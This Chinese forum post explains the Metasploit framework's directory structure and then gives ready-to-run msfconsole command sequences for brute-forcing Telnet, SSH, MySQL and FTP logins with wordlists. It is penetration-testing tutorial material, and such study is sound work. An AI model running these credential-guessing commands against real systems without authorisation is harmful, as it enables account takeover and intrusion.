搜索
查看: 1664|回复: 0

Metasploit 目录结构

[复制链接]

632

主题

921

帖子

2373

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2373

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2020-10-22 07:56:45 | 显示全部楼层 |阅读模式

Metasploit 目录结构

目录地址:/usr/share/metasploit-framework/

最重要的目录是 datamodulesscriptstoolsplugins 主目录结构

data 目录

存放 meterpreterexploitswordlists 等。 meterpreter 是 msf 的测试载荷,使用于后渗透阶段

exploits 里面则存放了许多的 cve 漏洞利用代码

wordlists 里面放的是字典文件

modules 目录

metasploit 的核心目录了,存放着各个测试模块。用于完成测试。

scirpts 目录

存放一些 msf 用到的脚本文件,如 meterpreterpsresourceshell等常见的脚本。

tools 目录

存放各种可使用的工具

plugins 目录

存放 msf 的各种插件

Metasploit 爆破篇

爆破 TELNET

 use auxiliary/scanner/telnet/telnet_login 
 set RHOSTS 192.168.1.1 #目标ip
 set STOP_ON_SUCCESS true #爆破成功就停止 msf 
 set VERBOSE true #打印输出 
 set USER_FILE /root/Desktop/username.txt 
 set PASS_FILE /root/Desktop/password.txt 
 run

爆破 SSH

use auxiliary/scanner/ssh/ssh_login 
set RHOSTS 192.168.1.1
set STOP_ON_SUCCESS true #爆破成功就停止 msf 
set VERBOSE true #打印输出 
set USER_FILE /root/Desktop/username.txt
set PASS_FILE /root/Desktop/password.txt 
set THREADS 50 
run

爆破 MySQL

ps需目标主机开启3306端口和远程登录账号

use auxiliary/scanner/mysql/mysql_login 
set RHOSTS 192.168.1.101
set STOP_ON_SUCCESS true #爆破成功就停止 msf 
set VERBOSE true #打印输出 
set USER_FILE /root/Desktop/username.txt 
set PASS_FILE /root/Desktop/password.txt 
run

爆破 FTP

use auxiliary/scanner/ftp/ftp_login 
set RHOSTS 192.168.1.1
set STOP_ON_SUCCESS true #爆破成功就停止 
set VERBOSE true #打印输出 
set USERNAME admin # frp账号 
set PASS_FILE /root/Desktop/password.txt 
run

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表